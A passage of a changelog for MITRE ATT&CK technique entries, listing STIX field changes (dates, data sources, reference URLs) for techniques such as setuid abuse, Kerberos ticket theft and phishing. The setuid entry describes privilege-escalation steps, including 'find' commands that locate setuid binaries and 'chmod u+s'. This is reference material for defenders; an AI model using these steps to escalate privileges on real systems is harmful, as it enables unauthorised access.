>overy](https://attack.mitre.org/techniques/T1083)). The setu>overy](https://attack.mitre.org/techniques/T1083)). The setu
>id and setguid bits are indicated with an "s" instead of an >id and setguid bits are indicated with an "s" instead of an 
>"x" when viewing a file's attributes via <code>ls -l</code>.>"x" when viewing a file's attributes via <code>ls -l</code>.
> The <code>find</code> command can also be used to search fo> The <code>find</code> command can also be used to search fo
>r such files. For example, <code>find / -perm +4000 2>/dev/n>r such files. For example, <code>find / -perm +4000 2>/dev/n
>ull</code> can be used to find files with setuid set and <co>ull</code> can be used to find files with setuid set and <co
>de>find / -perm +2000 2>/dev/null</code> may be used for set>de>find / -perm +2000 2>/dev/null</code> may be used for set
>gid. Binaries that have these bits set may then be abused by>gid. Binaries that have these bits set may then be abused by
> adversaries.(Citation: GTFOBins Suid)> adversaries.(Citation: GTFOBins Suid)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 15:07:53.060000+00:002023-03-15 18:43:20.995000+00:00
descriptionAn adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgit bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]File: File ModificationFile: File Metadata
x_mitre_data_sources[1]File: File MetadataFile: File Modification

[T1547.009] Boot or Logon Autostart Execution: Shortcut Modification

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 22:29:46.175000+00:002023-03-30 21:01:49.848000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/132.html', 'external_id': 'CAPEC-132'}
x_mitre_data_sourcesProcess: Process Creation

[T1072] Software Deployment Tools

Current version: 2.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
values_changed
STIX FieldOld valueNew Value
modified2020-12-11 17:00:00.938000+00:002023-03-30 21:01:36.669000+00:00
x_mitre_data_sources[0]Process: Process CreationApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/187.html', 'external_id': 'CAPEC-187'}

[T1518] Software Discovery

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
values_changed
STIX FieldOld valueNew Value
modified2022-01-29 00:02:24.150000+00:002023-03-30 21:01:50.920000+00:00
x_mitre_data_sources[1]Firewall: Firewall EnumerationFirewall: Firewall Metadata
x_mitre_data_sources[3]Firewall: Firewall MetadataProcess: Process Creation
x_mitre_data_sources[4]Process: Process CreationFirewall: Firewall Enumeration
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/580.html', 'external_id': 'CAPEC-580'}

[T1027.002] Obfuscated Files or Information: Software Packing

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 02:09:27.046000+00:002023-03-30 21:01:48.113000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/570.html', 'external_id': 'CAPEC-570'}

[T1036.006] Masquerading: Space after Filename

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesDan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-649
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 20:26:01.690000+00:002023-03-30 21:01:52.873000+00:00
external_references[1]['source_name']capecMac Backdoors are back
external_references[1]['url']https://capec.mitre.org/data/definitions/649.htmlhttps://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Mac Backdoors are back', 'description': 'Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.', 'url': 'https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/'}

[T1566.001] Phishing: Spearphishing Attachment

Current version: 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesMicrosoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-163
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 17:39:12.452000+00:002023-03-30 21:01:42.995000+00:00
external_references[1]['source_name']capecMicrosoft Anti Spoofing
external_references[1]['url']https://capec.mitre.org/data/definitions/163.htmlhttps://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
external_references[2]['source_name']Microsoft Anti SpoofingACSC Email Spoofing
external_references[2]['description']Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
external_references[2]['url']https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwidehttps://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[3]['source_name']ACSC Email SpoofingElastic - Koadiac Detection with EQL
external_references[3]['description']Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.
external_references[3]['url']https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdfhttps://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Elastic - Koadiac Detection with EQL', 'description': 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.', 'url': 'https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql'}

[T1566.003] Phishing: Spearphishing via Service

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
values_changed
STIX FieldOld valueNew Value
modified2020-10-18 01:55:02.988000+00:002023-03-30 21:01:50.401000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/163.html', 'external_id': 'CAPEC-163'}

[T1132.001] Data Encoding: Standard Encoding

Current version: 1.0


Old Description
New Description
t1Adversaries may encode data with a standard data encoding syt1Adversaries may encode data with a standard data encoding sy
>stem to make the content of command and control traffic more>stem to make the content of command and control traffic more
> difficult to detect. Command and control (C2) information c> difficult to detect. Command and control (C2) information c
>an be encoded using a standard data encoding system that adh>an be encoded using a standard data encoding system that adh
>eres to existing protocol specifications. Common data encodi>eres to existing protocol specifications. Common data encodi
>ng schemes include ASCII, Unicode, hexadecimal, Base64, and >ng schemes include ASCII, Unicode, hexadecimal, Base64, and 
>MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation>MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation:
>: Wikipedia Character Encoding) Some data encoding systems m> Wikipedia Character Encoding) Some data encoding systems ma
>ay also result in data compression, such as gzip.>y also result in data compression, such as gzip.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-14 23:36:52.095000+00:002023-03-03 00:31:33.071000+00:00
descriptionAdversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
external_references[1]['source_name']Wikipedia Binary-to-text EncodingUniversity of Birmingham C2
external_references[1]['description']Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url']https://en.wikipedia.org/wiki/Binary-to-text_encodinghttps://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name']Wikipedia Character EncodingWikipedia Binary-to-text Encoding
external_references[2]['description']Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.
external_references[2]['url']https://en.wikipedia.org/wiki/Character_encodinghttps://en.wikipedia.org/wiki/Binary-to-text_encoding
external_references[3]['source_name']University of Birmingham C2Wikipedia Character Encoding
external_references[3]['description']Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.
external_references[3]['url']https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdfhttps://en.wikipedia.org/wiki/Character_encoding

[T1558] Steal or Forge Kerberos Tickets

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesSean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-652
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:45:01.934000+00:002023-03-30 21:01:50.214000+00:00
external_references[1]['source_name']capecADSecurity Kerberos Ring Decoder
external_references[1]['url']https://capec.mitre.org/data/definitions/652.htmlhttps://adsecurity.org/?p=227
external_references[2]['source_name']ADSecurity Kerberos Ring DecoderMicrosoft Klist
external_references[2]['description']Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.
external_references[2]['url']https://adsecurity.org/?p=227https://docs.microsoft.com/windows-server/administration/windows-commands/klist
external_references[3]['source_name']Microsoft KlistMIT ccache
external_references[3]['description']Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.
external_references[3]['url']https://docs.microsoft.com/windows-server/administration/windows-commands/klisthttps://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
external_references[4]['source_name']MIT ccacheLinux Kerberos Tickets
external_references[4]['description']Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.
external_references[4]['url']https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.htmlhttps://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
external_references[5]['source_name']Linux Kerberos TicketsBrining MimiKatz to Unix
external_references[5]['description']Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.htmlhttps://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
external_references[6]['source_name']Brining MimiKatz to UnixKekeo
external_references[6]['description']Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
external_references[6]['url']https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdfhttps://github.com/gentilkiwi/kekeo
external_references[7]['source_name']KekeoSpectorOps Bifrost Kerberos macOS 2019
external_references[7]['description']Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.
external_references[7]['url']https://github.com/gentilkiwi/kekeohttps://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
external_references[8]['source_name']SpectorOps Bifrost Kerberos macOS 2019macOS kerberos framework MIT
external_references[8]['description']Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.
external_references[8]['url']https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744fhttp://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
external_references[9]['source_name']macOS kerberos framework MITADSecurity Detecting Forged Tickets
external_references[9]['description']Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.
external_references[9]['url']http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.htmlhttps://adsecurity.org/?p=1515
external_references[10]['source_name']ADSecurity Detecting Forged TicketsStealthbits Detect PtT 2019
external_references[10]['description']Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.
external_references[10]['url']https://adsecurity.org/?p=1515https://blog.stealthbits.com/detect-pass-the-ticket-attacks
external_references[11]['source_name']Stealthbits Detect PtT 2019CERT-EU Golden Ticket Protection
external_references[11]['description']Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
external_references[11]['url']https://blog.stealthbits.com/detect-pass-the-ticket-attackshttps://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
external_references[12]['source_name']CERT-EU Golden Ticket ProtectionMicrosoft Kerberos Golden Ticket
external_references[12]['description']Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.
external_references[12]['url']https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdfhttps://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
external_references[13]['source_name']Microsoft Kerberos Golden TicketMicrosoft Detecting Kerberoasting Feb 2018
external_references[13]['description']Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.
external_references[13]['url']https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
external_references[14]['source_name']Microsoft Detecting Kerberoasting Feb 2018AdSecurity Cracking Kerberos Dec 2015
external_references[14]['description']Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.
external_references[14]['url']https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/https://adsecurity.org/?p=2293
external_references[15]['source_name']AdSecurity Cracking Kerberos Dec 2015Medium Detecting Attempts to Steal Passwords from Memory
external_references[15]['description']Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.
external_references[15]['url']https://adsecurity.org/?p=2293https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
x_mitre_data_sources[0]Command: Command ExecutionActive Directory: Active Directory Credential Request
x_mitre_data_sources[1]Logon Session: Logon Session MetadataFile: File Access
x_mitre_data_sources[2]Active Directory: Active Directory Credential RequestCommand: Command Execution
x_mitre_data_sources[3]File: File AccessLogon Session: Logon Session Metadata
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Medium Detecting Attempts to Steal Passwords from Memory', 'description': 'French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.', 'url': 'https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea'}

[T1027.003] Obfuscated Files or Information: Steganography

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesWikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-636
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 16:46:56.760000+00:002023-03-30 21:01:48.815000+00:00
external_references[1]['source_name']capecWikipedia Duqu
external_references[1]['url']https://capec.mitre.org/data/definitions/636.htmlhttps://en.wikipedia.org/wiki/Duqu
external_references[2]['source_name']Wikipedia DuquMcAfee Malicious Doc Targets Pyeongchang Olympics
external_references[2]['description']Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.
external_references[2]['url']https://en.wikipedia.org/wiki/Duquhttps://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'McAfee Malicious Doc Targets Pyeongchang Olympics', 'description': 'Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.', 'url': 'https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/'}

[T1195] Supply Chain Compromise

Current version: 1.5

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-28 16:03:22.870000+00:002023-03-30 21:01:42.446000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/437.html', 'external_id': 'CAPEC-437'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/438.html', 'external_id': 'CAPEC-438'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/439.html', 'external_id': 'CAPEC-439'}

[T1542.001] Pre-OS Boot: System Firmware

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesWikipedia. (n.d.). BIOS. Retrieved January 5, 2016.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-532
values_changed
STIX FieldOld valueNew Value
modified2020-05-19 21:22:37.865000+00:002023-03-30 21:01:49.493000+00:00
external_references[1]['source_name']capecWikipedia BIOS
external_references[1]['url']https://capec.mitre.org/data/definitions/532.htmlhttps://en.wikipedia.org/wiki/BIOS
external_references[2]['source_name']Wikipedia BIOSWikipedia UEFI
external_references[2]['description']Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.
external_references[2]['url']https://en.wikipedia.org/wiki/BIOShttps://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface
external_references[3]['source_name']Wikipedia UEFIAbout UEFI
external_references[3]['description']Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.
external_references[3]['url']https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interfacehttp://www.uefi.org/about
external_references[4]['source_name']About UEFIMITRE Trustworthy Firmware Measurement
external_references[4]['description']UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.
external_references[4]['url']http://www.uefi.org/abouthttp://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research
external_references[5]['source_name']MITRE Trustworthy Firmware MeasurementMITRE Copernicus
external_references[5]['description']Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.
external_references[5]['url']http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-researchhttp://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about
external_references[6]['source_name']MITRE CopernicusMcAfee CHIPSEC Blog
external_references[6]['description']Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.
external_references[6]['url']http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-abouthttps://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
external_references[7]['source_name']McAfee CHIPSEC BlogGithub CHIPSEC
external_references[7]['description']Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.
external_references[7]['url']https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/https://github.com/chipsec/chipsec
external_references[8]['source_name']Github CHIPSECIntel HackingTeam UEFI Rootkit
external_references[8]['description']Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.
external_references[8]['url']https://github.com/chipsec/chipsechttp://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Intel HackingTeam UEFI Rootkit', 'description': "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", 'url': 'http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html'}

[T1082] System Information Discovery

Current version: 2.5

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-06 22:11:56.413000+00:002023-03-30 21:01:40.871000+00:00
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: OS API Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/312.html', 'external_id': 'CAPEC-312'}

[T1016] System Network Configuration Discovery

Current version: 1.5

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-06 22:32:35.833000+00:002023-03-30 21:01:38.842000+00:00
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[1]Script: Script ExecutionCommand: Command Execution
x_mitre_data_sources[2]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[3]Process: OS API ExecutionScript: Script Execution
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/309.html', 'external_id': 'CAPEC-309'}

[T1080] Taint Shared Content

Current version: 1.3

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesRoutin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-562
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:12:33.188000+00:002023-03-30 21:01:36.145000+00:00
external_references[1]['source_name']capecRetwin Directory Share Pivot
external_references[1]['url']https://capec.mitre.org/data/definitions/562.htmlhttps://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Retwin Directory Share Pivot', 'description': 'Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.', 'url': 'https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html'}
x_mitre_data_sourcesProcess: Process Creation

[T1021.005] Remote Services: VNC

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesT. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-555
values_changed
STIX FieldOld valueNew Value
modified2021-10-07 22:14:25.528000+00:002023-03-30 21:01:46.879000+00:00
external_references[1]['source_name']capecThe Remote Framebuffer Protocol
external_references[1]['url']https://capec.mitre.org/data/definitions/555.htmlhttps://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
external_references[2]['source_name']The Remote Framebuffer ProtocolMacOS VNC software for Remote Desktop
external_references[2]['description']T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.
